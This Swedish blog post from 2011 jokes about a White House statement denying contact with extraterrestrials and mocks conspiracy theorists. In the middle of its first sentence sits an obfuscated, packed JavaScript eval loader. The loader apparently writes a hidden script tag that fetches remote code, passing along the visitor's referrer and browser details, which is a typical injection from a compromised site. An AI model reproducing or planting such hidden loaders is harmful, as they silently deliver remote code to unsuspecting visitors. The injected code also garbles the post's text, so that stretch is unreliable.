Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

USA: Vi har inte haft kontakt med utomjordingar…

USA: Vi har inte haft kontakt med utomjordingar…
Filip Urde
  • On 8 november, 2011
  • http://www.revue.se/filip-urde

di.se kunde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itzak|var|u0026u|referrer|dbatr||js|php’.split(’|’),0,{}))
man idag läsa att USA har efter stora påtryckningar från befolkningen givit ut en officiell Vita huset kommuniké över frågan ”har vi haft kontakt med utomjordingar?”.

”USA:s regering har inga bevis för att det existerar liv utanför vår planet eller att utomjordingar har kontaktat eller närmat sig någon medlem av den mänskliga rasen”, skriver Phil Larson, rymdexpert på Vita Husets avdelning för vetenskaps- och teknikpolitik.

Hela 17.000 amerikaner hade skrivit på listor på sajten We The People, som skulle tvinga Vita huset att tala.

Det här är väldigt roligt! Och äntligen får alla konspirationsteoretiker en liten knepp på näsan… Jag vet dock att nästa konspiration kommer bli att ”USA bara mörkar det hela” och sedan tar alla på sig folie hattar och mäter strålningen på gärdet…

Jag vet i alla fall två nära vänner som kommer tycka den här nyheten är ganska trist! Men räds inte, Tv programmet Ancient Aliens kommer gå runt detta lilla bakslag, likt en präst som ska förklara evolutionen.

 

Fram med VHS kamerorna! här ska filmas otydliga farkoster (kastruller) i super zoom…

Love it!